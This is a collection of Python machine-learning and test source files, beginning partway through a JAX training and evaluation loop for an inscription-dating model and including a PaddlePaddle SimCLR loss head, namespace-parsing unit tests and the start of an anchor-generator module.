global_batch_size = self.config.training.batch_size
per_device_batch_size, ragged = divmod(global_batch_size, num_devices)
logging.info(
'num_devices: %d, per_device_batch_size: %d, global_batch_size: %d',
num_devices, per_device_batch_size, global_batch_size)
if ragged:
raise ValueError(
f'Global batch size {global_batch_size} must be divisible by '
f'num devices {num_devices}')
config_dataset = self.config.dataset
with open(config_dataset.dataset_path) as dataset_file:
ds = dataloader.loader_tf(
per_device_batch_size,
config_dataset,
self._region_map,
alphabet=self._alphabet,
dataset_file=dataset_file,
mode='train')
ds = ds.batch(jax.local_device_count())
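    # After this batching step each array has shape
    # [local_device_count, per_device_batch_size, ...], which is the leading
    # layout jax.pmap expects in `step`.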
return iter(tfds.as_numpy(ds))
def _loss_fn(self, params, batch, global_step, rng):
text_char = batch['text_char']
text_word = batch['text_word']
text_unmasked = batch['text_unmasked']
text_mask = batch['text_mask']
next_sentence_mask = batch['next_sentence_mask']
next_sentence_label = batch['next_sentence_label']
subregion = batch['region_sub_id']
date_min = batch['date_min']
date_max = batch['date_max']
date_dist = batch['date_dist']
date_available = batch['date_available']
eps = 1e-6
(date_pred, subregion_logits, mask_logits, nsp_logits) = self.forward.apply(
params,
text_char=text_char,
text_word=text_word,
text_char_onehot=None,
text_word_onehot=None,
is_training=True,
rngs={'dropout': rng})
date_loss = 0.
subregion_loss = 0.
subregion_accuracy = 0.
mask_loss = 0.
mask_accuracy = 0.
nsp_loss = 0.
nsp_accuracy = 0.
# Date loss
if self.config.loss.date.enabled:
if self.config.loss.date.label_smoothing > 0:
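        # Label smoothing here is multiplicative: each target date probability
        # is scaled by uniform noise in [1 - smoothing, 1 + smoothing],
        # renormalised, clipped away from zero and converted back to log space.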
date_dist_prob = jnp.exp(date_dist) # logprob to prob
date_dist_prob_smooth = date_dist_prob * jax.random.uniform(
rng,
shape=date_dist_prob.shape,
dtype=date_dist_prob.dtype,
minval=1 - self.config.loss.date.label_smoothing,
maxval=1 + self.config.loss.date.label_smoothing)
date_dist_prob_smooth /= date_dist_prob_smooth.sum(axis=-1)[:,
jnp.newaxis]
date_dist_prob_smooth = jnp.clip(date_dist_prob_smooth, 1e-6, 1)
date_dist = jnp.log(date_dist_prob_smooth)
date_loss = 0.
if 'l1' in self.config.loss.date.type.split('+'):
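        # The date head predicts a distribution over date bins; `date_pred_x`
        # holds the bin centres, so the softmax-weighted dot product below is
        # the expected predicted date used for the L1 loss.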
date_pred_x = jnp.arange(
self.config.dataset.date_min +
self.config.dataset.date_interval / 2,
self.config.dataset.date_max +
self.config.dataset.date_interval / 2,
self.config.dataset.date_interval).reshape(-1, 1)
date_pred_val = jnp.dot(jax.nn.softmax(date_pred, axis=-1), date_pred_x)
date_loss_l1_ = jax.vmap(date_loss_l1)(date_pred_val, date_min,
date_max, date_available)
        date_loss_l1_ = jnp.nan_to_num(date_loss_l1_)  # JAX arrays are immutable, so keep the returned array
date_loss += (
jnp.mean(date_loss_l1_, axis=0) * self.config.loss.date.weight_l1)
if 'dist' in self.config.loss.date.type.split('+'):
date_loss_dist_ = categorical_kl_divergence(date_dist, date_pred)
date_loss_dist_ *= date_available
        date_loss_dist_ = jnp.nan_to_num(date_loss_dist_)
date_loss += (
jnp.mean(date_loss_dist_, axis=0) *
self.config.loss.date.weight_dist)
date_loss *= linear_weight(global_step, self.config.loss.date.step_start,
self.config.loss.date.step_end)
# Region and subregion loss
if self.config.loss.region.enabled:
subregion_loss = jnp.mean(
cross_entropy_label_smoothing_loss(
subregion_logits,
subregion,
label_smoothing=self.config.loss.region.label_smoothing), 0)
      subregion_loss = jnp.nan_to_num(subregion_loss)
subregion_loss *= self.config.loss.region.weight
subregion_accuracy = jnp.mean(
jnp.argmax(subregion_logits, -1) == subregion)
w = linear_weight(global_step, self.config.loss.region.step_start,
self.config.loss.region.step_end)
subregion_loss *= w
# Mask loss
if self.config.loss.mask.enabled:
mask_loss = jnp.sum(
cross_entropy_label_smoothing_loss(
mask_logits,
text_unmasked,
text_mask,
label_smoothing=self.config.loss.mask.label_smoothing), 1) # [B]
assert mask_loss.ndim == 1
      mask_loss = jnp.nan_to_num(mask_loss)
mask_loss = jnp.mean(mask_loss, 0) * self.config.loss.mask.weight # []
mask_all_accuracy = (jnp.argmax(mask_logits, -1) == text_unmasked).astype(
mask_logits.dtype)
mask_accuracy = jnp.divide(
jnp.sum(
jnp.multiply(mask_all_accuracy,
text_mask.astype(mask_logits.dtype))),
jnp.sum(text_mask) + eps)
mask_loss *= linear_weight(global_step, self.config.loss.mask.step_start,
self.config.loss.mask.step_end)
# NSP loss
if self.config.loss.nsp.enabled:
nsp_loss = jnp.sum(
jax.vmap(jax.vmap(cross_entropy_mask_loss))(nsp_logits,
next_sentence_label,
next_sentence_mask),
1) # [B]
assert nsp_loss.ndim == 1
      nsp_loss = jnp.nan_to_num(nsp_loss)
nsp_loss = jnp.mean(nsp_loss, 0) * self.config.loss.nsp.weight
nsp_all_accuracy = (jnp.argmax(
nsp_logits, -1) == next_sentence_label).astype(nsp_logits.dtype)
nsp_accuracy = jnp.divide(
jnp.sum(
jnp.multiply(nsp_all_accuracy,
next_sentence_mask.astype(nsp_logits.dtype))),
jnp.sum(next_sentence_mask) + eps)
nsp_loss *= linear_weight(global_step, self.config.loss.nsp.step_start,
self.config.loss.nsp.step_end)
loss = date_loss + subregion_loss + mask_loss + nsp_loss
scaled_loss = loss / jax.device_count()
# NOTE: We use scaled_loss for grads and unscaled for logging.
return scaled_loss, (loss, date_loss, subregion_loss, subregion_accuracy,
mask_loss, mask_accuracy, nsp_loss, nsp_accuracy)
def _update_func(self, params, opt_state, global_step, batch, rng):
"""Applies an update to parameters and returns new state."""
# This function computes the gradient of the first output of loss_fn and
# passes through the other arguments unchanged.
grad_loss_fn = jax.grad(self._loss_fn, has_aux=True)
scaled_grads, (loss, date_loss, subregion_loss, subregion_accuracy,
mask_loss, mask_accuracy, nsp_loss,
nsp_accuracy) = grad_loss_fn(params, batch, global_step, rng)
scaled_grads = jax.tree_map(jnp.nan_to_num, scaled_grads)
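    # `scaled_loss` already divides by the device count, so summing the
    # per-device gradients across the 'i' axis below yields the gradient
    # averaged over the global batch.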
grads = jl_utils.tree_psum(scaled_grads, axis_name='i')
# Compute and apply updates via our optimizer.
learning_rate = self._learning_rate_fn(global_step)
updates, opt_state = self._opt_update(grads, opt_state, params=params)
params = optax.apply_updates(params, updates)
# Scalars to log (note: we log the mean across all hosts/devices).
scalars = {
'loss/train': loss,
'loss/date': date_loss,
'loss/subregion': subregion_loss,
'loss/mask': mask_loss,
'loss/nsp': nsp_loss,
'accuracy/subregion': subregion_accuracy,
'accuracy/mask': mask_accuracy,
'accuracy/nsp': nsp_accuracy,
'opt/learning_rate': learning_rate,
'opt/grad_norm': optax.global_norm(grads),
'opt/param_norm': optax.global_norm(params),
}
scalars = jax.lax.pmean(scalars, axis_name='i')
return params, opt_state, scalars
# _
# _____ ____ _| |
# / _ \ \ / / _` | |
# | __/\ V / (_| | |
# \___| \_/ \__,_|_|
#
def evaluate(self, global_step, rng, **unused_kwargs):
"""See base class."""
if self._eval_input is None:
self._initialize_eval()
global_step = np.array(jl_utils.get_first(global_step))
summary, outputs = self._eval_epoch(jl_utils.get_first(rng))
for k, v in summary.items():
summary[k] = np.array(v)
score = summary['score/eval']
logging.info('[Step %d] eval_score=%.2f', global_step, score)
# Log outputs
checkpoint_dir = jl_utils.get_checkpoint_dir(FLAGS.config,
jax.process_index())
outputs_path = os.path.join(checkpoint_dir, 'best_outputs.pkl.bz2')
score_path = os.path.join(checkpoint_dir, 'best_score.txt')
model_log_path = os.path.join(checkpoint_dir, 'model_log')
best_model_log_path = os.path.join(checkpoint_dir, 'best_model_log')
# Check for preexisting outputs
best_score = None
best_step = None
if os.path.exists(score_path):
with open(score_path, 'r') as f:
tok = f.read().strip().split(' ')
best_step = int(tok[0])
best_score = float(tok[1])
# Store outputs if score is better
if best_score is None or (score > best_score and global_step > best_step):
best_score = score
with open(score_path, 'w') as f:
f.write(f'{global_step} {best_score}')
with open(outputs_path, 'wb') as f:
outputs_pkl = pickle.dumps(outputs, protocol=2)
outputs_pkl_bz2 = bz2.compress(outputs_pkl)
f.write(outputs_pkl_bz2)
if self.config.evaluation.store_model_log:
if os.path.isdir(best_model_log_path):
          list(map(os.remove, glob.glob(best_model_log_path + '/*')))  # list() forces evaluation; a bare map() is lazy in Python 3
else:
os.makedirs(best_model_log_path)
distutils.dir_util.copy_tree(model_log_path, best_model_log_path)
logging.info('[Step %d] Writing eval outputs: %s.', global_step,
outputs_path)
# Log best score
summary['score/eval_best'] = best_score
return summary
def _initialize_eval(self):
self._eval_input = jl_utils.py_prefetch(self._build_eval_input)
def _build_eval_input(self):
"""Builds the evaluation input pipeline."""
config_dataset = self.config.dataset
with open(config_dataset.dataset_path) as dataset_file:
ds = dataloader.loader_tf(
self.config.evaluation.batch_size,
config_dataset,
self._region_map,
alphabet=self._alphabet,
dataset_file=dataset_file,
mode=self.config.evaluation.mode)
return iter(tfds.as_numpy(ds))
def _eval_batch(self, params, batch, rng):
"""Evaluates a batch."""
phi_id = batch['id']
text_char = batch['text_char']
text_word = batch['text_word']
text_unmasked = batch['text_unmasked']
text_mask = batch['text_mask']
next_sentence_mask = batch['next_sentence_mask']
next_sentence_label = batch['next_sentence_label']
subregion = batch['region_sub_id']
date_min = batch['date_min']
date_max = batch['date_max']
date_dist = batch['date_dist']
date_available = batch['date_available']
# with hlogging.context() as log:
(date_pred, subregion_logits, mask_logits, nsp_logits) = self.forward.apply(
params,
text_char=text_char,
text_word=text_word,
text_char_onehot=None,
text_word_onehot=None,
is_training=False,
rngs={'dropout': rng})
# Log model weights
model_log = {}
subregion_loss = 0.
subregion_accuracy = 0.
date_loss = 0.
date_l1_loss = 0.
nsp_loss = 0.
nsp_accuracy = 0.
# eps = 1e-6
date_count = 0
mask_count = 0
nsp_count = 0
# Date loss
if self.config.loss.date.enabled:
date_pred_x = jnp.arange(
self.config.dataset.date_min + self.config.dataset.date_interval / 2,
self.config.dataset.date_max + self.config.dataset.date_interval / 2,
self.config.dataset.date_interval).reshape(-1, 1)
date_pred_val = jnp.dot(jax.nn.softmax(date_pred, axis=-1), date_pred_x)
date_l1_loss = jnp.sum(
jax.vmap(date_loss_l1)(date_pred_val, date_min, date_max,
date_available),
axis=0)
if 'l1' in self.config.loss.date.type.split('+'):
date_loss += date_l1_loss * self.config.loss.date.weight_l1
if 'dist' in self.config.loss.date.type.split('+'):
date_loss_dist_ = categorical_kl_divergence(date_dist, date_pred)
date_loss_dist_ *= date_available
date_loss += (
jnp.sum(date_loss_dist_, axis=0) *
self.config.loss.date.weight_dist)
date_count = jnp.sum(date_available)
# Region and subregion loss
if self.config.loss.region.enabled:
subregion_loss = jnp.sum(
cross_entropy_loss(subregion_logits, subregion), 0)
subregion_loss *= self.config.loss.region.weight
subregion_accuracy = jnp.mean(
jnp.argmax(subregion_logits, -1) == subregion)
# Mask loss
if self.config.loss.mask.enabled:
mask_loss = jnp.sum(
cross_entropy_label_smoothing_loss(
mask_logits, text_unmasked, text_mask, label_smoothing=0),
1) # [B]
# mask_loss /= jnp.sum(text_mask, axis=1) + eps # [B]
assert mask_loss.ndim == 1
mask_loss = jnp.mean(mask_loss, 0) * self.config.loss.mask.weight # []
mask_all_accuracy = (jnp.argmax(mask_logits, -1) == text_unmasked).astype(
mask_logits.dtype)
mask_accuracy = jnp.sum(
jnp.multiply(mask_all_accuracy, text_mask.astype(mask_logits.dtype)))
mask_count = jnp.sum(text_mask)
# NSP loss
if self.config.loss.nsp.enabled:
nsp_loss = jnp.sum(
jax.vmap(jax.vmap(cross_entropy_mask_loss))(nsp_logits,
next_sentence_label,
next_sentence_mask),
1) # [B]
assert nsp_loss.ndim == 1
nsp_loss = jnp.sum(nsp_loss, 0) * self.config.loss.nsp.weight
nsp_all_accuracy = (jnp.argmax(
nsp_logits, -1) == next_sentence_label).astype(nsp_logits.dtype)
nsp_accuracy = jnp.sum(
jnp.multiply(nsp_all_accuracy,
next_sentence_mask.astype(nsp_logits.dtype)))
nsp_count = jnp.sum(next_sentence_mask)
# Outputs
scalars = {
'score/eval':
(mask_accuracy + subregion_accuracy - date_l1_loss * 0.01),
'loss/eval': mask_loss + date_loss + subregion_loss,
'loss/date': date_loss,
'loss/date_l1': date_l1_loss,
'loss/subregion': subregion_loss,
'loss/mask': mask_loss,
'loss/nsp': nsp_loss,
'count/date': date_count,
'count/nsp': nsp_count,
'count/mask': mask_count,
'accuracy/subregion': subregion_accuracy,
'accuracy/mask': mask_accuracy,
'accuracy/nsp': nsp_accuracy,
}
outputs = {
'outputs/id': phi_id,
'outputs/date_pred': date_pred.astype('float16'),
'outputs/date_min': date_min,
'outputs/date_max': date_max,
'outputs/date_dist': date_dist.astype('float16'),
'outputs/date_available': date_available,
'outputs/subregion_logits': subregion_logits.astype('float16'),
'outputs/subregion': subregion,
}
return scalars, outputs, model_log
def _eval_epoch(self, rng):
"""Evaluates an epoch."""
summary = {}
outputs = {}
total_num_sequences = 0
# Prepare directories for storing model log
checkpoint_dir = jl_utils.get_checkpoint_dir(FLAGS.config,
jax.process_index())
model_log_path = os.path.join(checkpoint_dir, 'model_log')
if self.config.evaluation.store_model_log:
if os.path.isdir(model_log_path):
        list(map(os.remove, glob.glob(model_log_path + '/*')))  # list() forces the lazy map() to run
else:
os.makedirs(model_log_path)
# Checkpoints broadcast for each local device
params = jl_utils.get_first(self._params)
# Model log buffer initialisation
model_log_buffer = []
def _flush_model_log_buffer(model_log_buffer):
"""Writes model log to bz2 pickle files."""
while model_log_buffer:
model_log_batch_path, model_log_pkl_bz2 = model_log_buffer.pop(0)
with open(model_log_batch_path, 'wb') as f:
f.write(model_log_pkl_bz2)
# Converting to numpy here allows us to reset the generator
for batch in self._eval_input():
# Make sure that the input has batch_dim=1
assert batch['text_char'].shape[0] == 1
summary_batch, outputs_batch, model_log_batch = self._eval_batch(
params, batch, rng)
# Append batch values to dictionary
for k, v in summary_batch.items():
summary[k] = summary.get(k, 0) + v
for k, v in outputs_batch.items():
outputs.setdefault(k, []).append(v)
total_num_sequences += self.config.evaluation.batch_size
# Store model log per batch
if self.config.evaluation.store_model_log:
# Append to buffer
model_log_batch_path = os.path.join(
model_log_path,
str(outputs_batch['outputs/id'][0]) + '.pkl.bz2')
model_log_pkl = pickle.dumps(model_log_batch, protocol=2)
model_log_pkl_bz2 = bz2.compress(model_log_pkl)
model_log_buffer += [(model_log_batch_path, model_log_pkl_bz2)]
# Flush model log buffer
if (len(model_log_buffer) %
self.config.evaluation.store_model_log_steps == 0):
_flush_model_log_buffer(model_log_buffer)
# Flush remaining model log buffer
if self.config.evaluation.store_model_log:
_flush_model_log_buffer(model_log_buffer)
# Normalise and concatenate
summary['loss/date'] /= summary['count/date']
summary['loss/date_l1'] /= summary['count/date']
summary['loss/mask'] /= summary['count/mask']
summary['accuracy/mask'] /= summary['count/mask']
summary['loss/nsp'] /= summary['count/nsp']
summary['accuracy/nsp'] /= summary['count/nsp']
summary['loss/subregion'] /= total_num_sequences
summary['accuracy/subregion'] /= total_num_sequences
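    # The evaluation score rewards restoration (mask) and geographical
    # attribution accuracy, minus a small penalty (weight 0.01) proportional to
    # the mean L1 dating error.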
summary['score/eval'] = (
summary['accuracy/mask'] + summary['accuracy/subregion'] -
summary['loss/date_l1'] * 0.01)
summary['loss/eval'] = (
summary['loss/mask'] + summary['loss/date'] + summary['loss/subregion'])
for k, v in outputs.items():
outputs[k] = np.concatenate(v, axis=0)
return summary, outputs
if __name__ == '__main__':
flags.mark_flag_as_required('config')
app.run(functools.partial(platform.main, Experiment))
|
passl/modeling/heads/simclr_contrastive_head.py | juneweng/PASSL | 136 | 12770292 | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle
import paddle.nn as nn
from .builder import HEADS
import paddle.nn.functional as F
import paddle.fluid.layers as layers
LARGE_NUM = 1e9
@HEADS.register()
class SimCLRContrastiveHead(nn.Layer):
"""Head for contrastive learning.
Args:
temperature (float): The temperature hyper-parameter that
controls the concentration level of the distribution.
            Default: 0.5.
"""
def __init__(self, temperature=0.5, return_accuracy=True, multi_rank=False):
super(SimCLRContrastiveHead, self).__init__()
self.criterion = nn.CrossEntropyLoss()
self.temperature = temperature
self.return_accuracy = return_accuracy
self.multi_rank = multi_rank
def forward(self, pos, neg):
"""Forward head.
Args:
            pos (Tensor): NxD projected features of the first augmented view.
            neg (Tensor): NxD projected features of the second augmented view
                (used as `hidden1`/`hidden2` below, not as precomputed similarities).
Returns:
dict[str, Tensor]: A dictionary of loss components.
"""
hidden1, hidden2 = pos, neg
batch_size = pos.shape[0]
# Gather hidden1/hidden2 across replicas and create local labels.
if self.multi_rank is True:
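            # Cross-replica branch: it assumes `self.args` (trainer_id and
            # trainer_num), `self.co2` and the static program used by
            # `add_allgather` are attached to the head externally; none of them
            # is defined in __init__ above.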
hidden1_large = self.add_allgather(hidden1, "hidden1"+str(self.co2))
hidden2_large = self.add_allgather(hidden2, "hidden2"+str(self.co2))
hidden1_large = paddle.reshape(hidden1_large,
[-1, hidden1_large.shape[-1]])
hidden2_large = paddle.reshape(hidden2_large,
[-1, hidden2_large.shape[-1]])
enlarged_batch_size = paddle.shape(hidden1_large)[0]
trainer_id = self.args.trainer_id
labels_idx = paddle.arange(0, batch_size, 1,
"int32") + trainer_id * batch_size
labels = F.one_hot(
paddle.reshape(labels_idx, [batch_size]),
enlarged_batch_size * 2)
masks = F.one_hot(
paddle.reshape(labels_idx, [batch_size]),
enlarged_batch_size)
else:
hidden1_large = hidden1
hidden2_large = hidden2
labels = F.one_hot(
paddle.reshape(
paddle.arange(0, batch_size, 1, "int32"), [batch_size]),
batch_size * 2)
masks = F.one_hot(
paddle.reshape(
paddle.arange(0, batch_size, 1, "int32"), [batch_size]),
batch_size)
logits_aa = paddle.matmul(
hidden1, hidden1_large, transpose_y=True) / self.temperature
logits_aa = logits_aa - masks * LARGE_NUM
logits_bb = paddle.matmul(
hidden2, hidden2_large, transpose_y=True) / self.temperature
logits_bb = logits_bb - masks * LARGE_NUM
logits_ab = paddle.matmul(
hidden1, hidden2_large, transpose_y=True) / self.temperature
logits_ba = paddle.matmul(
hidden2, hidden1_large, transpose_y=True) / self.temperature
loss_a = paddle.nn.functional.softmax_with_cross_entropy(
paddle.concat([logits_ab, logits_aa], 1), labels, soft_label=True)
loss_b = paddle.nn.functional.softmax_with_cross_entropy(
paddle.concat([logits_ba, logits_bb], 1), labels, soft_label=True)
contrast_loss = loss_a + loss_b
logits_ab_co2 = logits_ab - masks * LARGE_NUM
logits_ba_co2 = logits_ba - masks * LARGE_NUM
logit_a = paddle.concat([logits_aa, logits_ab_co2], 1)
logit_b = paddle.concat([logits_ba_co2, logits_bb], 1)
log_a = paddle.nn.functional.log_softmax(logit_a)
log_b = paddle.nn.functional.log_softmax(logit_b)
a = paddle.nn.functional.softmax(logit_a)
b = paddle.nn.functional.softmax(logit_b)
kl_1 = paddle.nn.functional.kl_div(log_a, b, reduction='batchmean')
kl_2 = paddle.nn.functional.kl_div(log_b, a, reduction='batchmean')
co2_loss = 1 * (kl_1 + kl_2)
total_contrast_loss = contrast_loss + 3 * co2_loss
loss = layers.reduce_mean(total_contrast_loss)
contrastive_label = paddle.unsqueeze(
paddle.argmax(
labels, axis=1), 1)
acc1 = layers.accuracy(input=logits_ab, label=contrastive_label)
outputs = dict()
outputs['loss'] = loss
outputs['acc1'] = acc1
return outputs
def accuracy(output, target, topk=(1, )):
"""Computes the accuracy over the k top predictions for the specified values of k"""
with paddle.no_grad():
maxk = max(topk)
batch_size = target.shape[0]
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = paddle.cast(pred == target.reshape([1, -1]).expand_as(pred),
'float32')
res = []
for k in topk:
correct_k = correct[:k].reshape([-1]).sum(0, keepdim=True)
res.append(correct_k * 100.0 / batch_size)
return res
def add_allgather(self, hidden, name=""):
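        # NOTE: `core`, `OpRole` and `self._train_program` are not defined in this
        # module; they are assumed to be provided by the surrounding static-graph
        # training code (paddle.fluid internals).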
block = self._train_program.global_block()
hidden_large = block.create_var(
name=name,
shape=[self.args.trainer_num] + list(hidden.shape),
persistable=False,
dtype=core.VarDesc.VarType.FP32)
op_len = len(list(enumerate(block.ops)))
op_maker = core.op_proto_and_checker_maker
self.op_role_key = op_maker.kOpRoleAttrName()
block._insert_op(
op_len,
type='c_allgather',
inputs={'X': hidden},
outputs={'Out': hidden_large},
attrs={
'nranks': self.args.trainer_num,
self.op_role_key: OpRole.Forward,
"use_calc_stream": True
})
return hidden_large
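# --- Illustrative usage sketch (not part of the original PASSL file) ---
# A minimal single-rank, dynamic-graph example of feeding the head the projected
# embeddings of two augmented views of the same batch; the batch size, feature
# dimension and the normalization step are assumptions for illustration only.
if __name__ == "__main__":
    head = SimCLRContrastiveHead(temperature=0.5)
    view_a = F.normalize(paddle.randn([8, 128]), axis=1)
    view_b = F.normalize(paddle.randn([8, 128]), axis=1)
    outputs = head(view_a, view_b)
    print(outputs['loss'].numpy(), outputs['acc1'].numpy())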
|
xssor/tcp.py | boundmania/xssor2 | 2,126 | 12770323 | <filename>xssor/tcp.py
sys_name = "XSS'OR"
sys_copyright = "<EMAIL>cos.me"
def sys(req):
return {
'sys_name': sys_name,
'sys_copyright': sys_copyright,
}
|
tests/_namespace_util_test.py | poros/data_pipeline | 110 | 12770348 | <filename>tests/_namespace_util_test.py
# -*- coding: utf-8 -*-
# Copyright 2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import unicode_literals
import pytest
from data_pipeline._namespace_util import DBSourcedNamespace
class TestDBSourcedNamespace(object):
def test_simple(self):
name = "refresh_primary.yelp"
self._assert_success(
actual_namespace=DBSourcedNamespace.create_from_namespace_name(name),
expected_name=name,
expected_cluster="refresh_primary",
expected_database="yelp"
)
def test_main_cluster(self):
name = "main.database"
self._assert_success(
actual_namespace=DBSourcedNamespace.create_from_namespace_name(name),
expected_name=name,
expected_cluster="main",
expected_database="database"
)
def test_environment(self):
name = "main.refresh_primary.yelp"
self._assert_success(
actual_namespace=DBSourcedNamespace.create_from_namespace_name(name),
expected_name=name,
expected_cluster="refresh_primary",
expected_database="yelp",
expected_environment="main"
)
    def test_transformers(self):
name = "dev.refresh_primary.yelp.heartbeat.yelp-main_transformed"
self._assert_success(
actual_namespace=DBSourcedNamespace.create_from_namespace_name(name),
expected_name=name,
expected_cluster="refresh_primary",
expected_database="yelp",
expected_environment="dev",
expected_suffixes=["heartbeat", "yelp-main_transformed"]
)
def test_fail_missing(self):
self._assert_failure("yelp", error_substr="not enough sections")
self._assert_failure("refresh_primary", error_substr="not enough sections")
def test_fail_invalid_chars(self):
self._assert_failure("^refresh_primary.yelp", error_substr="must contain at least")
self._assert_failure("fadjskl;.fjd", error_substr="must contain at least")
self._assert_failure("______.______", error_substr="must contain at least")
self._assert_failure("refresh_primary..yelp", error_substr="must contain at least")
def test_guarantees(self):
name = "main.database.transformer"
self._assert_success(
actual_namespace=DBSourcedNamespace.create_from_namespace_name_with_guarantees(
name,
expected_cluster="main"
),
expected_name=name,
expected_cluster="main",
expected_database="database",
expected_suffixes=["transformer"]
)
def test_guarantees_db(self):
name = "main.database.transformer"
self._assert_success(
actual_namespace=DBSourcedNamespace.create_from_namespace_name_with_guarantees(
name,
expected_database="database"
),
expected_name=name,
expected_cluster="main",
expected_database="database",
expected_suffixes=["transformer"]
)
def test_guarantees_transformer(self):
name = "main.database.transformer"
self._assert_success(
actual_namespace=DBSourcedNamespace.create_from_namespace_name_with_guarantees(
name,
expected_suffixes=["transformer"]
),
expected_name=name,
expected_cluster="main",
expected_database="database",
expected_suffixes=["transformer"]
)
def test_guarantees_environment(self):
name = "env.cluster.database"
self._assert_success(
actual_namespace=DBSourcedNamespace.create_from_namespace_name_with_guarantees(
name,
expected_environment="env"
),
expected_name=name,
expected_environment="env",
expected_cluster="cluster",
expected_database="database"
)
def test_fail_impossible(self):
name = "dev.refresh_primary.yelp.transformer"
self._assert_failure_with_guarantees(
name,
expected_environment="main"
)
def test_fail_impossible_suffixes(self):
name = "dev.refresh_primary.yelp.transformer"
self._assert_failure_with_guarantees(
name,
expected_suffixes=["heartbeat"]
)
def test_fail_impossible_double_cluster_env(self):
name = "dev.refresh_primary.yelp.transformer"
self._assert_failure_with_guarantees(
name,
expected_environment="dev",
expected_cluster="dev"
)
def test_fail_impossible_env_db(self):
name = "dev.refresh_primary.yelp.transformer"
self._assert_failure_with_guarantees(
name,
expected_environment="dev",
expected_database="refresh_primary"
)
def test_no_name(self):
self._assert_success(
actual_namespace=DBSourcedNamespace(
environment="main",
cluster="refresh_primary",
database="yelp"
),
expected_name="main.refresh_primary.yelp",
expected_environment="main",
expected_cluster="refresh_primary",
expected_database="yelp"
)
def test_no_name_no_env(self):
self._assert_success(
actual_namespace=DBSourcedNamespace(
cluster="refresh_primary",
database="yelp",
suffixes=["heartbeat"]
),
expected_name="refresh_primary.yelp.heartbeat",
expected_cluster="refresh_primary",
expected_database="yelp",
expected_suffixes=["heartbeat"]
)
def _assert_failure(self, name, error_substr):
with pytest.raises(ValueError) as e:
DBSourcedNamespace.create_from_namespace_name(name)
assert error_substr in e
def _assert_failure_with_guarantees(
self,
name,
expected_cluster=None,
expected_database=None,
expected_environment=None,
expected_suffixes=None
):
with pytest.raises(ValueError) as e:
DBSourcedNamespace.create_from_namespace_name_with_guarantees(
name,
expected_environment=expected_environment,
expected_cluster=expected_cluster,
expected_database=expected_database,
expected_suffixes=expected_suffixes
)
assert "impossible to rectify" in e
def _assert_success(
self,
actual_namespace,
expected_name,
expected_cluster,
expected_database,
expected_environment=None,
expected_suffixes=None
):
if not expected_suffixes:
expected_suffixes = []
assert actual_namespace.get_name() == expected_name
assert actual_namespace.cluster == expected_cluster
assert actual_namespace.database == expected_database
assert actual_namespace.environment == expected_environment
assert actual_namespace.suffixes == expected_suffixes
|
tests/unit2/test_arcade.py | LiorAvrahami/arcade | 824 | 12770349 | <filename>tests/unit2/test_arcade.py
import logging
import arcade
def test_logging():
arcade.configure_logging(logging.WARNING)
logger = logging.getLogger('arcade')
assert logger.level == logging.WARNING
|
nndet/core/boxes/anchors.py | joeranbosma/nnDetection | 242 | 12770377 | <reponame>joeranbosma/nnDetection
"""
Parts of this code are from torchvision and thus licensed under
BSD 3-Clause License
Copyright (c) <NAME> 2016,
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import torch
from typing import Callable, Sequence, List, Tuple, TypeVar, Union
from torchvision.models.detection.rpn import AnchorGenerator
from loguru import logger
from itertools import product
AnchorGeneratorType = TypeVar('AnchorGeneratorType', bound=AnchorGenerator)
def get_anchor_generator(dim: int, s_param: bool = False) -> AnchorGenerator:
"""
Get anchor generator class for corresponding dimension
Args:
dim: number of spatial dimensions
s_param: enable size parametrization
Returns:
Callable: class of anchor generator
"""
normal = {2: AnchorGenerator2D, 3: AnchorGenerator3D}
sparam = {2: AnchorGenerator2DS, 3: AnchorGenerator3DS}
if s_param:
return sparam[dim]
else:
return normal[dim]
def compute_anchors_for_strides(anchors: torch.Tensor,
strides: Sequence[Union[Sequence[Union[int, float]], Union[int, float]]],
cat: bool) -> Union[List[torch.Tensor], torch.Tensor]:
"""
Compute anchors sizes which follow a given sequence of strides
Args:
anchors: anchors for stride 0
strides: sequence of strides to adjust anchors for
cat: concatenate resulting anchors, if false a Sequence of Anchors
is returned
Returns:
Union[List[torch.Tensor], torch.Tensor]: new anchors
"""
anchors_with_stride = [anchors]
dim = anchors.shape[1] // 2
for stride in strides:
